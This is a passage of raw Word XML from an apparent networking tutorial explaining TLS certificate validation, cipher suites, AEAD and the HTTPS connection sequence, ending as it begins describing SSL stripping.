          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Certificate Validation — The Full Chain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6601D50C" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>When a browser receives a server certificate, it performs a complete </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>chain of trust</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> validation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F5727B7" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 1 — Chain construction:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> The server presents its certificate and intermediate CA certificates. The browser constructs the chain:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9B8911" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E65F77" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Server Certificate (leaf)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE92FAB" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">  → signed by Intermediate CA 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED6B25A" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">    → signed by Intermediate CA 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D84EAA7" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">      → signed by Root CA (in browser's/OS's trust store)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2AFF34" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>The browser must reach a </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>trusted root CA</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> — one of ~150 CAs whose root certificates are pre-installed in the OS or browser. If the chain doesn't reach a trusted root (or is broken), the connection fails.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8D555E" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 2 — Signature verification:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> Each certificate in the chain is signed by the CA above it. The browser verifies each signature cryptographically — confirming the certificate was genuinely issued by that CA and hasn't been tampered with.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C10CB12" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 3 — Validity period:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> Each certificate has notBefore and notAfter timestamps. The current time must be within this window. Expired certificates are rejected. This is why clock accuracy matters for TLS — a client with a wrong system clock may reject valid certificates (if its clock is in the future past notAfter) or accept expired ones (if its clock is in the past before notBefore).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B4B35CD" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 4 — Revocation checking:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> Certificates can be revoked before expiry (private key compromise, certificate misissued, domain ownership changed). Two revocation mechanisms:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F5BBF28" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>CRL (Certificate Revocation List):</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve"> The CA publishes a list of revoked certificate serial numbers. The browser downloads the CRL and checks if the certificate's serial number is in </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:lastRenderedPageBreak/>
        <w:t>it. Problems: CRLs can be megabytes large (a CA may have millions of revoked certs). CRLs have update delays — a freshly revoked certificate may not appear in the CRL immediately. Must be freshly downloaded to be meaningful.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC13885" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>OCSP (Online Certificate Status Protocol):</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> The browser queries the CA's OCSP responder with the certificate's serial number and gets a signed response: good, revoked, or unknown. More real-time than CRL. Problem: adds latency (one additional HTTP request per TLS connection). Privacy concern: the CA learns which sites you're visiting (OCSP requests reveal which certificates are being validated).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A2421A" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>OCSP Stapling:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> The </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>server</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> queries the OCSP responder periodically and caches the signed OCSP response. It </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>staples</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> this response to the TLS handshake (in the CertificateStatus message). The client gets the OCSP response directly from the server — no additional OCSP request, no privacy leak to the CA. The signed response is still valid (CA-signed with a short TTL) — the server can't forge it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73CE959E" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>OCSP Must-Staple:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> A certificate extension requiring that OCSP stapling always be present. Clients reject connections to servers that present a certificate with must-staple but don't include the stapled OCSP response. Prevents the </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>soft-fail problem</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> — most browsers fail open on OCSP failures (allow the connection if OCSP is unavailable) because failing all HTTPS connections when the CA's OCSP server is down is unacceptable. Must-Staple enables hard-fail behavior for specific certificates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574EB4C0" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 5 — Hostname verification:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> The certificate's </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Subject Alternative Names (SANs)</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> must include the hostname the client is connecting to. The browser compares the hostname in the SNI (www.example.com) against the SANs in the certificate. Wildcards are supported (*.example.com matches www.example.com but not sub.www.example.com — only one level).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01790863" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Common Name (CN) deprecation:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> Historically, the hostname was in the certificate's Subject CN field. Modern browsers (since ~2017) only check SANs — the CN field is ignored for hostname validation. Certificates without SANs are rejected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B438141" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 6 — Certificate Transparency (CT) verification:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> Since 2018, Chrome requires all publicly trusted certificates to be logged in </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Certificate Transparency logs</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> — append-only, publicly auditable logs of every issued certificate. The certificate must include </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SCTs (Signed Certificate Timestamps)</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> proving it was logged. This prevents CAs from issuing rogue certificates for domains they shouldn't (e.g., a CA issuing a certificate for google.com to a government for surveillance) — such certificates would appear in the CT logs and be detected by domain owners.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C25271" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cipher Suites — What They Actually Specify:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E15E07" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:lastRenderedPageBreak/>
        <w:t>A cipher suite is a named combination of cryptographic algorithms used in a TLS connection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E111BE" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19726411" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5475A2F0" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">  ECDHE  → Key exchange algorithm (Elliptic Curve Diffie-Hellman Ephemeral)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF8A4F5" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">  RSA    → Authentication algorithm (server's cert uses RSA key)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40DD27B1" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">  AES_256_GCM → Symmetric cipher (AES-256 in GCM mode — AEAD)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F487F39" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">  SHA384 → HMAC algorithm for the PRF (Pseudorandom Function)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B45AA51" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>TLS 1.3 simplified cipher suites to only specify the symmetric cipher (key exchange and authentication are always ECDHE + the cert's key type):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA39B99" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="519522EF" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>TLS_AES_256_GCM_SHA384</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="616A094F" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>TLS_CHACHA20_POLY1305_SHA256</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF3F769" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>TLS_AES_128_GCM_SHA256</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19675D93" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>AEAD (Authenticated Encryption with Associated Data):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D7D8F7E" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Modern cipher suites use AEAD modes (AES-GCM, ChaCha20-Poly1305) that combine encryption and authentication in one operation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F6AC5D" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="832"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>AES-GCM:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> AES in Galois/Counter Mode. Provides encryption (CTR mode) and authentication (GHASH authentication tag). Requires hardware AES acceleration (AES-NI instruction) for good performance. On modern CPUs: ~1GB/s per core.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="463F5296" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="832"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ChaCha20-Poly1305:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> ChaCha20 stream cipher + Poly1305 MAC. Designed for software efficiency — no special hardware needed. Faster than AES-GCM on devices without AES-NI (older CPUs, ARM mobile chips without crypto extensions). Used as the preferred cipher on mobile clients.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0650266D" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The authentication tag</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> (16 bytes appended to each TLS record) is the integrity guarantee — any modification of the ciphertext produces a different tag, which the receiver detects and rejects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BDEE695" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:pict w14:anchorId="7B537827">
          <v:rect id="_x0000_i3574" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4140CACE" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. HTTPS — HTTP Over TLS — The Complete Picture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB11128" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>What Changes When You Add TLS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CEC20F2" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>URL scheme:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> http:// → https://. Default port 80 → 443. The client's first action is a TLS handshake before any HTTP bytes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B8AFAB" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The complete HTTPS connection sequence:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D37FF19" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="784242F6" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>1. DNS resolution: www.example.com → 93.184.216.34</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="210FD240" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B"/>
    <w:p w14:paraId="7701B6E4" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>2. TCP handshake (1 RTT):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D23A46" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">   SYN →</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77124334" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">        ← SYN-ACK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A90F70" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">   ACK →</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC204BD" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B"/>
    <w:p w14:paraId="003CCAB0" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>3. TLS 1.3 handshake (1 RTT):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37387783" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">   ClientHello →</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4DB190" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">               ← ServerHello + EncryptedExtensions + Certificate + </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA1A26D" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">                  CertificateVerify + Finished</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E10385" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">   Finished →</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D50C994" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">   (HTTP request can be sent here, simultaneously with Finished)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F51F874" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B"/>
    <w:p w14:paraId="56B52AC5" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>4. HTTP/2 connection preface:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F369CFB" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">   PRI * HTTP/2.0\r\n\r\nSM\r\n\r\n →</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D314C15" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">   SETTINGS frame →</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1740A80F" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">                  ← SETTINGS frame</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="267C069E" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">   SETTINGS ACK →</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F169397" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B"/>
    <w:p w14:paraId="202910E7" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>5. HTTP/2 request (stream 1):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="627A29EF" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">   HEADERS frame [GET /index.html, Host: www.example.com, ...] →</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A7A2A0" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">                  ← HEADERS frame [200 OK, Content-Type: text/html, ...]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51167DB6" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">                  ← DATA frames [HTML body]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E181B0" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B"/>
    <w:p w14:paraId="74391D38" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Total: 2 RTTs before first byte of response (1 TCP + 1 TLS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E22D6D8" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>With 0-RTT resumption: 1 RTT (1 TCP + 0-RTT TLS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2998ECB8" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>With QUIC (HTTP/3): 1 RTT new / 0 RTT resumed (QUIC combines TCP+TLS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ABE16EC" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HTTP Strict Transport Security (HSTS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="198251E6" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The SSL stripping attack:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="378CA931" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Without HSTS, a user typing example.com (not https://example.com) sends an initial HTTP request. A man-in-the-middle can:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A437EF7" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="833"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
